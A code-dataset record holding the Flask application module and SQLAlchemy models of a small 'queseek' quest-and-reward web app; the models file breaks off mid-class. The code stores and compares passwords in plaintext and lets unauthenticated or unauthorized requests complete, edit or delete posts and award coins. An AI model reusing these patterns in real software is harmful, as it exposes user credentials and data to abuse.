"avg_line_length": 33.20185470581055,
"blob_id": "92012f01534986a672c73cf397dbfab7f64a8f69",
"content_id": "4c4006d24e26bb8129acbf8e78ffa93bf7ea56a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33210,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 971,
"path": "/app/__init__.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Flask, url_for, redirect, render_template, request, abort, send_from_directory, flash, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import exists, func, update\nfrom sqlalchemy.orm import aliased\nfrom flask_login import LoginManager, UserMixin, current_user, login_user, logout_user, login_required\nimport random\nimport re\nfrom sqlalchemy import desc, asc\nfrom datetime import datetime\nimport pytz\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\n\ndb = SQLAlchemy(app)\nlogin = LoginManager(app)\nlogin.login_view = 'login'\n\n\[email protected]_loader\ndef load_user(id):\n return User.query.get(id)\n\n\nclass Base(db.Model):\n __abstract__ = True\n\n def add(self):\n try:\n db.session.add(self)\n self.save()\n except:\n db.session.rollback()\n\n def save(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n self.save()\n except:\n pass\n\n\nfrom app.bp_events.controllers import events\nfrom app.bp_api.controllers import api\n\napp.register_blueprint(events, url_prefix=\"/events\")\napp.register_blueprint(api, url_prefix=\"/api\")\n\nfrom app.models import User, UserProfile\nfrom app.models import Quest, QuestsAccepted, QuestCoinsTransaction, QuestComments\nfrom app.models import Seek, SeeksAccepted, SeekCoinsTransaction, SeekComments\nfrom app.models import Avatars, UserAvatars\nfrom app.forms import LoginForm, SignUpForm, QuestForm, SeekForm, QuestCommentsForm, SeekCommentsForm\n\ndb.create_all()\n\n\[email protected]_processor\ndef inject_dict_for_all_templates():\n if (not current_user.is_anonymous):\n userprofile = (db.session.query(UserProfile)\n .filter(UserProfile.id == current_user.id)\n .first()\n )\n return dict(current_user_avatar=userprofile.avatarId)\n\n return dict()\n\n\[email protected]('/complete/<id>', methods=[\"POST\"])\ndef complete(id):\n if request.method == 'POST':\n user = User.query.filter_by(id=request.form['user']).first()\n userProfile = UserProfile.query.filter_by(id=user.id).first()\n\n if id.startswith('Q'):\n q = Quest.query.filter_by(questId=id).first()\n reward = q.reward\n\n # add user to questsCompleted table\n questTransaction = QuestCoinsTransaction(questId=id, userId=user.id, coins=reward,\n completed_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(questTransaction)\n db.session.commit()\n\n coinsBefore = userProfile.coinsCollected\n\n # give reward to user\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance + reward)})\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsCollected\": (UserProfile.coinsCollected + reward)})\n\n coinsAfter = userProfile.coinsCollected\n coinsToNext = userProfile.coinsCollected % 20\n\n if (int(coinsAfter / 20) > int(coinsBefore / 20)):\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"level\": UserProfile.level + 1})\n\n if (coinsToNext == 0):\n coinsToNext = 20\n\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsToNext\": coinsToNext})\n\n db.session.commit()\n\n return redirect(url_for('quest'))\n\n if id.startswith('S'):\n q = Seek.query.filter_by(seekId=id).first()\n\n # add user to questsCompleted table\n seekTransaction = SeekCoinsTransaction(seekId=id, userId=current_user.id,\n completed_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(seekTransaction)\n db.session.commit()\n\n # give reward to poster\n reward = q.reward\n\n db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance + reward)})\n db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n update({\"coinsCollected\": (UserProfile.coinsCollected + reward)})\n db.session.commit()\n\n return redirect(url_for('seek'))\n\n\[email protected]('/delete/<id>', methods=[\"POST\"])\ndef delete(id):\n # print(id)\n if id.startswith('Q'):\n db.session.query(Quest).filter(Quest.questId == id).update({\"state\": 2})\n db.session.commit()\n return redirect(url_for('quest'))\n\n elif id.startswith('S'):\n db.session.query(Seek).filter(Seek.seekId == id).update({\"state\": 2})\n db.session.commit()\n return redirect(url_for('seek'))\n\n\[email protected]('/accept/<id>', methods=[\"POST\"])\ndef accept(id):\n if id.startswith('Q'):\n qa = QuestsAccepted(questId=id, userId=current_user.get_id())\n db.session.add(qa)\n db.session.commit()\n return redirect(url_for('home_quests_accepted'))\n\n\n elif id.startswith('S'):\n\n sa = SeeksAccepted(seekId=id, userId=current_user.get_id())\n db.session.add(sa)\n db.session.commit()\n return redirect(url_for('home_seeks_accepted'))\n return redirect(url_for('home'))\n\n\[email protected]('/forfeit/<id>', methods=[\"POST\"])\ndef forfeit(id):\n if id.startswith('Q'):\n qf = (db.session.query(User, QuestsAccepted)\n .filter(User.id == QuestsAccepted.userId)\n .filter(User.id == current_user.get_id())\n .filter(QuestsAccepted.questId == id)\n .first())\n\n db.session.delete(qf[1])\n db.session.commit()\n\n elif id.startswith('S'):\n sf = (db.session.query(User, SeeksAccepted)\n .filter(User.id == SeeksAccepted.userId)\n .filter(User.id == current_user.get_id())\n .filter(SeeksAccepted.seekId == id)\n .first())\n\n db.session.delete(sf[1])\n db.session.commit()\n\n return redirect(url_for('home'))\n\n\n# home\[email protected]('/')\ndef index():\n if (not current_user.is_anonymous):\n questsCreated = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.userId == current_user.get_id())\n .filter(Quest.state == 0)\n .order_by(Quest.posted_at.desc())\n .all())\n return render_template('index.html', rows=questsCreated, page='home')\n return render_template('index.html', rows=None, page='home')\n\n\[email protected]('/home')\ndef home():\n return index()\n\n\[email protected]('/home/YourQuests')\ndef home_your_quests():\n return index()\n\n\[email protected]('/home/YourSeeks')\ndef home_your_seeks():\n if (not current_user.is_anonymous):\n seeksCreated = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.userId == current_user.get_id())\n .order_by(Seek.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=seeksCreated, page='ys')\n\n return index()\n\n\[email protected]('/home/QuestsAccepted')\ndef home_quests_accepted():\n if (not current_user.is_anonymous):\n questsAccepted = (db.session.query(User, Quest, QuestsAccepted)\n .filter(User.id == Quest.userId)\n .filter(QuestsAccepted.questId == Quest.questId)\n .filter(QuestsAccepted.userId == current_user.get_id())\n .order_by(Quest.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=questsAccepted, page='qa')\n\n return index()\n\n\[email protected]('/home/SeeksAccepted')\ndef home_seeks_accepted():\n if (not current_user.is_anonymous):\n seeksAccepted = (db.session.query(User, Seek, SeeksAccepted)\n .filter(User.id == Seek.userId)\n .filter(SeeksAccepted.seekId == Seek.seekId)\n .filter(SeeksAccepted.userId == current_user.get_id())\n .order_by(Seek.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=seeksAccepted, page='sa')\n\n return index()\n\n\[email protected]('/quest')\ndef quest():\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.state == 0)\n .filter(Quest.type == 0)\n .order_by(Quest.posted_at.desc())\n .all())\n\n return render_template('quest.html', rows=q, page='quest')\n\n\[email protected]('/quest/HeroQuests')\ndef hero_quests():\n return redirect(url_for('quest'))\n\n\[email protected]('/quest/SideQuests')\ndef side_quests():\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.state == 0)\n .filter(Quest.type == 1)\n .order_by(Quest.posted_at.desc())\n .all())\n return render_template('quest.html', rows=q, page='sq')\n\n\[email protected]('/quest/<id>')\ndef nextQuest(id):\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.questId == id)\n .order_by(Quest.posted_at.desc())\n .first())\n\n # Get all that completed quest\n q1 = (db.session.query(User.id, User, QuestCoinsTransaction)\n .filter(QuestCoinsTransaction.questId == id)\n .filter(User.id == QuestCoinsTransaction.userId)\n .all()\n )\n\n q1id = (db.session.query(User.id)\n .filter(QuestCoinsTransaction.questId == id)\n .filter(User.id == QuestCoinsTransaction.userId)\n # .all()\n )\n\n # Get all users that accepted but not completed\n q2 = (db.session.query(User, QuestsAccepted)\n .filter(QuestsAccepted.questId == id)\n .filter(User.id == QuestsAccepted.userId)\n .filter(User.id.notin_(q1id))\n .all()\n )\n\n accepted = False\n completed = False\n\n if current_user.is_authenticated:\n # Check if current user already accepted quest\n acceptStatus = (db.session.query(User, QuestsAccepted)\n .filter(User.id == current_user.id)\n .filter(User.id == QuestsAccepted.userId)\n .filter(QuestsAccepted.questId == id)\n .first())\n\n if acceptStatus is not None:\n accepted = True\n\n # Check if current user already completed quest\n completeStatus = (db.session.query(User, QuestCoinsTransaction)\n .filter(User.id == current_user.id)\n .filter(User.id == QuestCoinsTransaction.userId)\n .filter(QuestCoinsTransaction.questId == id)\n .first())\n\n if completeStatus is not None:\n completed = True\n\n form = QuestCommentsForm()\n form.questId.data = id\n if current_user.is_authenticated:\n form.userId.data = current_user.id\n if (q[1].userId == current_user.id):\n form.is_creator.data = 1\n else:\n form.is_creator.data = 0\n\n comments = (db.session.query(QuestComments, User, UserProfile)\n .filter(User.id == QuestComments.userId)\n .filter(User.id == UserProfile.id)\n .filter(QuestComments.questId == id)\n .order_by(QuestComments.posted_at.desc())\n .all()\n )\n\n for i in comments:\n print('comments', i[0].posted_at)\n\n # print(comments[0])\n # print(comments[0][2].avatarId)\n return render_template('questDescription.html', quests=q, id=id,\n accepted=accepted, completed=completed,\n usersaccepted=q2, userscompleted=q1, comments=comments,\n form=form)\n\n\[email protected]('/questComment', methods=[\"POST\"])\ndef questComment():\n if request.method == 'POST':\n questId = request.form['questId']\n userId = request.form['userId']\n is_creator = request.form['is_creator']\n description = request.form['description']\n # assign id to comment\n already = True\n while already:\n commentId = questId + str(random.randint(1, 30000))\n # check if id exists in DB\n idcheck = (db.session.query(QuestComments.commentId)\n .filter(QuestComments.commentId == commentId)\n .order_by(QuestComments.posted_at.desc())\n .first()\n )\n if idcheck is None:\n already = False\n\n qc = QuestComments(commentId=commentId, questId=questId, userId=userId, description=description,\n is_creator=is_creator, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(qc)\n db.session.commit()\n return redirect(url_for('nextQuest', id=questId))\n\n\[email protected]('/seek')\ndef seek():\n q = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.state == 0)\n .order_by(Seek.posted_at.desc())\n .all())\n return render_template('seek.html', rows=q, page='seek')\n\n\[email protected]('/seek/<id>')\ndef nextSeek(id):\n q = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.seekId == id)\n .order_by(Seek.posted_at.desc())\n .first())\n\n # Get all that completed seek\n q1 = (db.session.query(User.id, User, SeekCoinsTransaction)\n .filter(SeekCoinsTransaction.seekId == id)\n .filter(User.id == SeekCoinsTransaction.userId)\n .all()\n )\n\n q1id = (db.session.query(User.id)\n .filter(SeekCoinsTransaction.seekId == id)\n .filter(User.id == SeekCoinsTransaction.userId)\n # .all()\n )\n\n # Get all users that accepted but not completed\n q2 = (db.session.query(User, SeeksAccepted)\n .filter(SeeksAccepted.seekId == id)\n .filter(User.id == SeeksAccepted.userId)\n .filter(User.id.notin_(q1id))\n .all()\n )\n\n accepted = False\n completed = False\n\n if current_user.is_authenticated:\n # Check if current user already accepted seek\n acceptStatus = (db.session.query(User, SeeksAccepted)\n .filter(User.id == current_user.id)\n .filter(User.id == SeeksAccepted.userId)\n .filter(SeeksAccepted.seekId == id)\n .first())\n\n if acceptStatus is not None:\n accepted = True\n\n # Check if current user already completed seek\n completeStatus = (db.session.query(User, SeekCoinsTransaction)\n .filter(User.id == current_user.id)\n .filter(User.id == SeekCoinsTransaction.userId)\n .filter(SeekCoinsTransaction.seekId == id)\n .first())\n\n if completeStatus is not None:\n completed = True\n\n form = SeekCommentsForm()\n form.seekId.data = id\n if current_user.is_authenticated:\n form.userId.data = current_user.id\n if (q[1].userId == current_user.id):\n form.is_creator.data = 1\n else:\n form.is_creator.data = 0\n\n comments = (db.session.query(SeekComments, User, UserProfile)\n .filter(User.id == SeekComments.userId)\n .filter(User.id == UserProfile.id)\n .filter(SeekComments.seekId == id)\n .order_by(SeekComments.posted_at.desc())\n .all())\n # print(comments[0])\n\n return render_template('seekDescription.html', seeks=q, id=id,\n accepted=accepted, completed=completed,\n usersaccepted=q2, userscompleted=q1, comments=comments, form=form)\n\n\[email protected]('/seekComment', methods=[\"POST\"])\ndef seekComment():\n if request.method == 'POST':\n seekId = request.form['seekId']\n userId = request.form['userId']\n is_creator = request.form['is_creator']\n description = request.form['description']\n # assign id to comment\n already = True\n while already:\n commentId = seekId + str(random.randint(1, 30000))\n # check if id exists in DB\n idcheck = (db.session.query(SeekComments.commentId)\n .filter(SeekComments.commentId == commentId)\n .order_by(SeekComments.posted_at.desc())\n .first()\n )\n if idcheck is None:\n already = False\n\n sc = SeekComments(commentId=commentId, seekId=seekId, userId=userId, description=description,\n is_creator=is_creator, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(sc)\n db.session.commit()\n return redirect(url_for('nextSeek', id=seekId))\n\n\[email protected]('/forms/quest', methods=[\"GET\", \"POST\"])\ndef forms_quest():\n form = LoginForm()\n form2 = QuestForm()\n if not current_user.is_authenticated:\n return render_template('login.html', form=form)\n\n if request.method == 'POST':\n\n # assign id to quest\n already = True\n while already:\n questId = 'Q' + str(random.randint(1, 10000))\n\n # check if seek exists in DB\n idcheck = (db.session.query(Quest.questId)\n .filter(Quest.questId == questId)\n .first()\n )\n if idcheck is None:\n already = False\n\n reward = 20\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n type = request.form['type']\n user = User.query.filter_by(id=current_user.get_id()).first()\n\n quest = Quest(questId=questId, reward=reward,\n item=item, location=location,\n description=description, userId=user.id,\n type=type, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(quest)\n db.session.commit()\n return redirect(url_for('nextQuest', id=questId, code=307))\n\n else:\n return render_template('forms.html', form=form2)\n\n\[email protected]('/forms/seek', methods=[\"GET\", \"POST\"])\ndef forms_seek():\n form = LoginForm()\n form2 = QuestForm()\n if not current_user.is_authenticated:\n return render_template('login.html', form=form)\n\n if request.method == 'POST':\n\n # assign id to seek\n already = True\n while already:\n seekId = 'S' + str(random.randint(1, 10000))\n print(seekId)\n # check if seek exists in DB\n idcheck = (db.session.query(Seek.seekId)\n .filter(Seek.seekId == seekId)\n .first()\n )\n if idcheck is None:\n already = False\n\n reward = 20\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n user = User.query.filter_by(id=current_user.get_id()).first()\n\n seek = Seek(seekId=seekId, reward=reward,\n item=item, location=location,\n description=description, userId=user.id, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(seek)\n db.session.commit()\n return redirect(url_for('nextSeek', id=seekId, code=307))\n\n else:\n return render_template('forms.html', form=form2, page='sf')\n\n\[email protected]('/edit/<id>', methods=[\"GET\", \"POST\"])\ndef edit(id):\n # user = current_user\n if request.method == 'POST':\n\n try:\n # take form data\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n\n print(id)\n if id.startswith('Q'):\n # make changes to Quest\n db.session.query(Quest) \\\n .filter(Quest.questId == id). \\\n update({\"item\": item})\n db.session.query(Quest) \\\n .filter(Quest.questId == id). \\\n update({\"location\": location})\n db.session.query(Quest) \\\n .filter(Quest.questId == id). \\\n update({\"description\": description})\n db.session.commit()\n print('cde')\n return redirect(url_for('nextQuest', id=id, code=307))\n\n elif id.startswith('S'):\n\n # make changes to Seek\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"item\": item})\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"location\": location})\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"description\": description})\n db.session.commit()\n print('cde')\n return redirect(url_for('nextSeek', id=id, code=307))\n except:\n if id.startswith('Q'):\n quest = Quest.query.filter_by(questId=id).first()\n form = QuestForm()\n form.item.data = quest.item\n form.location.data = quest.location\n form.description.data = quest.description\n return render_template('edit.html', id=id, form=form, code=307)\n\n elif id.startswith('S'):\n print('error')\n seek = Seek.query.filter_by(seekId=id).first()\n form = SeekForm()\n form.item.data = seek.item\n form.location.data = seek.location\n form.description.data = seek.description\n return render_template('edit.html', id=id, form=form, code=307)\n\n\[email protected]('/faq')\ndef faq():\n return render_template('faq.html', page='faq')\n\n\[email protected]('/faq/general')\ndef faq_general():\n return redirect(url_for('faq'))\n\n\[email protected]('/faq/points_system')\ndef faq_points_system():\n return render_template('faq.html', page='points_system')\n\n\[email protected]('/faq/seekers')\ndef faq_seekers():\n return render_template('faq.html', page='seekers')\n\n\[email protected]('/leaderboard')\ndef leaderboard():\n # get all counts\n q1 = (db.session.query(User, func.count(QuestCoinsTransaction.questId).label('amt'))\n .group_by(User.id)\n .filter(User.id == QuestCoinsTransaction.userId)\n )\n q2 = q1.subquery()\n\n s1 = (db.session.query(User, func.count(SeekCoinsTransaction.seekId).label('amt'))\n .group_by(User.id)\n .filter(User.id == SeekCoinsTransaction.userId)\n )\n s2 = s1.subquery()\n\n # combine counts with user,userprofile\n q2 = (db.session.query(User, UserProfile, q2.c.amt, s2.c.amt)\n .outerjoin(q2, User.id == q2.c.id)\n .outerjoin(s2, User.id == s2.c.id)\n .filter(User.id == UserProfile.id)\n .order_by(UserProfile.coinsCollected.desc())\n .all()\n )\n\n print(q2)\n\n return render_template('leaderboard.html', query=q2, page='leaderboard')\n\n\[email protected]('/profile')\ndef profile():\n user = current_user\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n return render_template('profile.html', user=user, userprofile=userprofile)\n\n\[email protected]('/profile/general')\ndef profile_general():\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/avatars')\ndef profile_avatars():\n user = current_user\n userprofile = (db.session.query(UserProfile, Avatars)\n .filter(UserProfile.id == user.id)\n .filter(UserProfile.avatarId == Avatars.avatarId)\n .first()\n )\n\n print(userprofile)\n\n # UserProfile.query.filter_by(id=user.id).first()\n avatars = db.session.query(Avatars).all()\n ua = (db.session.query(UserAvatars.avatarId)\n .filter(user.id == UserAvatars.userId)\n .all())\n user_avatars = []\n for i in ua:\n user_avatars.append(i[0])\n\n return render_template('profile.html', user=user, userprofile=userprofile, page='avatars', avatars=avatars,\n user_avatars=user_avatars)\n\n\[email protected]('/profile/avatars/update/<avatarId>', methods=[\"GET\", \"POST\"])\ndef profile_avatars_update(avatarId):\n user = current_user\n if request.method == 'POST':\n db.session.query(UserProfile) \\\n .filter(UserProfile.id == user.id). \\\n update({\"avatarId\": avatarId})\n db.session.commit()\n\n return redirect(url_for('profile_avatars'))\n\n\[email protected]('/profile/avatars/unlock/<avatarId>', methods=[\"GET\", \"POST\"])\ndef profile_avatars_unlock(avatarId):\n user = current_user\n if request.method == 'POST':\n userProfile = (db.session.query(UserProfile)\n .filter(user.id == UserProfile.id)\n .first())\n\n avatar = (db.session.query(Avatars)\n .filter(avatarId == Avatars.avatarId)\n .first())\n print(avatar)\n\n # if enough coins\n if userProfile.coinsBalance >= avatar.coinsRequired:\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance - avatar.coinsRequired)})\n user_avatar = UserAvatars(avatarId=avatarId, userId=user.id)\n db.session.add(user_avatar)\n db.session.commit()\n\n return redirect(url_for('profile_avatars'))\n\n\[email protected]('/profile/badges')\ndef profile_badges():\n user = current_user\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n\n return render_template('profile.html', user=user, userprofile=userprofile, page='badges')\n\n\[email protected]('/settings', methods=[\"GET\", \"POST\"])\ndef settings():\n user = current_user\n if request.method == 'POST':\n # take form data\n email = request.form['email']\n username = request.form['username']\n print(username)\n # Check if email format correct\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', email)\n if match == None:\n # print('Bad Syntax')\n form = SignUpForm()\n return render_template('signup.html', form=form, err=\"invalid username or password\")\n # Check if email and username already in use\n userEmail = User.query.filter_by(email=email).first()\n userUsername = User.query.filter_by(username=username).first()\n if userEmail is not None and userUsername is not None:\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n form = SignUpForm()\n form.username.data = user.username\n form.email.data = user.email\n return render_template('settings.html', user=user, userprofile=userprofile, form=form)\n\n # make changes to user in DB\n db.session.query(User) \\\n .filter(User.id == user.id). \\\n update({\"username\": username})\n\n db.session.query(User) \\\n .filter(User.id == user.id). \\\n update({\"email\": email})\n\n db.session.commit()\n return redirect(url_for('settings'))\n else:\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n form = SignUpForm()\n form.username.data = user.username\n form.email.data = user.email\n return render_template('settings.html', user=user, userprofile=userprofile, form=form)\n\n\[email protected]('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n currUser = User.query.filter_by(username=username).first()\n\n # check if user exists in db and if password is correct\n if currUser is None or password != currUser.password:\n return render_template('login.html', form=form, err=\"Invalid username or password.\")\n user = currUser\n login_user(user, remember=user)\n flash(\"Log in successful!\")\n # print(user.email, user.username, user.password)\n return redirect(url_for('index'))\n else:\n return render_template('login.html', form=form)\n\n\[email protected]('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n form2 = SignUpForm()\n if request.method == 'POST':\n # else go to email, pass\n email = request.form['email']\n username = request.form['username']\n password = request.form['password']\n confirm = request.form['confirm']\n\n # Check if email format correct\n match = re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$', email)\n if match == None:\n return render_template('signup.html', form=form2, err=\"Invalid username or password.\")\n # Check if email and username already in use\n userEmail = User.query.filter_by(email=email).first()\n userUsername = User.query.filter_by(username=username).first()\n if userEmail is not None or userUsername is not None:\n return render_template('signup.html', form=form2, err=\"Username/email already exists.\")\n # Check if password equals confirm password\n if password != confirm:\n flash('Passwords do not match!')\n return render_template('signup.html', form=form2, err=\"Passwords do not match.\")\n\n # assign id to user\n already = True\n while already:\n id = 'U' + str(random.randint(1, 10001))\n # check if id exists in DB\n idcheck = (db.session.query(User.id)\n .filter(User.id == id)\n .first()\n )\n if idcheck is None:\n already = False\n\n user = User(id=id, email=email, password=password, username=username,\n created_at=datetime.now(pytz.timezone('Asia/Singapore'))\n )\n userprofile = UserProfile(id=id)\n user_avatar = UserAvatars(avatarId='0000', userId=id)\n login_user(user, remember=user)\n\n # store user in DB\n db.session.add(user)\n db.session.add(userprofile)\n db.session.add(user_avatar)\n db.session.commit()\n flash(\"Signup in successful!\")\n # print(User.query.all())\n return redirect(url_for('index'))\n else:\n return render_template('signup.html', form=form2)\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n# @app.route('/create')\n# def create():\n# # Create avatar data\n# avatar_data = [['0000', 'Eggsy(Default)', 0],\n# ['0001', 'Wilson', 25],\n# ['0002', 'Lady', 25],\n# ['0003', 'Rave', 50],\n# ['0004', 'Barry', 25],\n# ['0005', 'McDuck', 50],\n# ['0006', 'Coco Jumbo', 25],\n# ['0007', 'Wednesday', 50],\n# ['0008', 'P.Sherman', 25],\n# ['0009', 'Bluetterfly', 50],\n# ]\n#\n# for i in avatar_data:\n# u = Avatars(avatarId=i[0], name=i[1], coinsRequired=i[2])\n# db.session.add(u)\n#\n# # user_avatar = UserAvatars(avatarId='0001', userId='U22')\n# # db.session.add(user_avatar)\n# db.session.commit()\n\n # q = db.session.query(Avatars).all()\n # print(q)\n # print(q[0].name, q[0].avatarId)\n # return (str(q))\n # return ('avatars added')\n\n# @app.route('/money')\n# def money():\n# # give money etc\n# db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n# update({\"coinsBalance\": (UserProfile.coinsBalance + 200)})\n# db.session.commit()\n# return ('money given')\n#\n#\n# @app.route('/scrubComments')\n# def scrub():\n# # give money etc\n# # db.session.query(SeekComments) \\\n# # .filter(SeekComments.seekId == 'S9343') \\\n# # .filter(SeekComments.userId == current_user.id) \\\n# # .delete()\n# db.session.query(SeekCoinsTransaction) \\\n# .filter(SeekCoinsTransaction.userId == current_user.id) \\\n# .delete()\n#\n#\n# db.session.commit()\n# return ('comments deleted')\n\n\n# @app.route('/deleteUser')\n# def delete_user():\n# if (not current_user.is_anonymous):\n# # delete user\n# db.session.query(User) \\\n# .filter(User.id == current_user.id) \\\n# .delete()\n#\n# db.session.commit()\n# return ('user deleted')\n"
},
{
"alpha_fraction": 0.6896485686302185,
"alphanum_fraction": 0.7025158405303955,
"avg_line_length": 36.46043014526367,
"blob_id": "825756a65f00bee79319e2601a91fcb876d5f702",
"content_id": "2dbaac35863e24d5761470c0cf8bd0081eb3e136",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5207,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 139,
"path": "/app/models.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nimport pytz\nfrom app import db, Base\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import DateTime\nfrom flask_login import UserMixin\nfrom sqlalchemy import Column, Integer, String, ForeignKey\n\nimport random\n\n\nclass User(UserMixin, Base):\n __tablename__ = \"users\"\n\n id = db.Column(db.String, primary_key=True)\n email = db.Column(db.String(255), unique=True, nullable=False)\n password = db.Column(db.String(255), nullable=False)\n username = db.Column(db.String(255), unique=True, nullable=False)\n created_at = db.Column(DateTime(timezone=True))\n\n\nclass UserProfile(UserMixin, Base):\n __tablename__ = \"userProfile\"\n\n id = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n level = db.Column(db.Integer, nullable=False, default=1)\n coinsBalance = db.Column(db.Integer, nullable=False, default=50)\n coinsCollected = db.Column(db.Integer, nullable=False, default=0)\n coinsToNext = db.Column(db.Integer, nullable=False, default=20)\n avatarId = db.Column(db.String, ForeignKey('Avatars.avatarId'), default='0000')\n\n\nclass Quest(UserMixin, Base):\n __tablename__ = \"quests\"\n\n questId = db.Column(db.String, primary_key=True)\n reward = db.Column(db.Integer, nullable=False)\n item = db.Column(db.String(255), nullable=False)\n location = db.Column(db.String(255), nullable=False)\n description = db.Column(db.String(255))\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n posted_at = db.Column(DateTime(timezone=True))\n\n # State of quest. 0 for active, 1 for completed, 2 for deleted\n state = db.Column(db.Integer, nullable=False, default=0)\n # Type of quest. 0 for hero, 1 for side\n type = db.Column(db.Integer, nullable=False, default=0)\n # Is a featured quest. 0 for false, 1 for true\n featured = db.Column(db.Integer, nullable=False, default=0)\n\n # Number of users before quest marked as completed\n totalSeekers = db.Column(db.Integer, nullable=False, default=1)\n\n\nclass Seek(UserMixin, Base):\n __tablename__ = \"seeks\"\n\n seekId = db.Column(db.String, primary_key=True)\n reward = db.Column(db.Integer, nullable=False)\n item = db.Column(db.String(255), nullable=False)\n location = db.Column(db.String(255), nullable=False)\n description = db.Column(db.String(255))\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n # 0 is active, 1 is completed, 2 is deleted/incomplete\n state = db.Column(db.Integer, nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass QuestsAccepted(UserMixin, Base):\n __tablename__ = \"questsAccepted\"\n\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n\nclass SeeksAccepted(UserMixin, Base):\n __tablename__ = \"seeksAccepted\"\n\n seekId = db.Column(db.String, ForeignKey('seeks.seekId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n\nclass QuestCoinsTransaction(UserMixin, Base):\n __tablename__ = \"questCoinsTransaction\"\n\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n coins = db.Column(db.Integer, nullable=False, default=0)\n completed_at = db.Column(DateTime(timezone=True))\n\n\nclass SeekCoinsTransaction(UserMixin, Base):\n __tablename__ = \"seekCoinsTransaction\"\n\n seekId = db.Column(db.String, ForeignKey('seeks.seekId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n coins = db.Column(db.Integer, nullable=False, default=0)\n completed_at = db.Column(DateTime(timezone=True))\n\n\nclass QuestComments(UserMixin, Base):\n __tablename__ = \"questComments\"\n\n commentId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n questId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n description = db.Column(db.String(255), nullable=False)\n # 0 is false, # 1 is true\n is_creator = db.Column(db.Integer, nullable=False, default=0)\n posted_at = db.Column(DateTime(timezone=True))\n\n\nclass SeekComments(UserMixin, Base):\n __tablename__ = \"seekComments\"\n\n commentId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n seekId = db.Column(db.String, ForeignKey('quests.questId'), primary_key=True)\n userId = db.Column(db.String, ForeignKey('users.id'), primary_key=True)\n\n description = db.Column(db.String(255))\n # 0 is false, # 1 is true\n is_creator = db.Column(db.Integer, 